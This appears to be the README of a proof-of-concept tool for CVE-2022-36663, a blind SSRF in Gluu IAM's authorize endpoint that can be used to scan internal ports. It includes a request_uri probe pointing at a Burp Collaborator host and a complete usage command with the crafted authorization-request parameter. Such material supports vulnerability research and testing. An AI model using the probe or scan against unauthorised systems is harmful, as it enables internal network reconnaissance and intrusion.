Internal network scanner through Gluu IAM blind ssrf
Gluu IAM is vulnerable to blind SSRF which can be exploited to scan the internal network for open ports depending on response times.
https://nvd.nist.gov/vuln/detail/CVE-2022-36663
To check if the target is vulnerable, add &request_uri=http://burpcollab to the /oxauth/restv1/authorize request and poll for incoming traffic from the target server.
python3 CVE-2022-36663.py --url https://target --ip 10.10.10.10 --port 8080 --ar '/oxauth/restv1/authorize?client_id=<clientID>&redirect_uri=https://target.com/return.html&response_type=code&scope=openid+profile+email+user_name&nonce=<nonce>&acr_values=simple_password_auth&request_uri='
Url - the Gluu IAM server url
IP - The internal Ip address or subnet that you want to scan
Port - The internal port you want to scan
AR - The authorization request URL ending with an empty request_uri
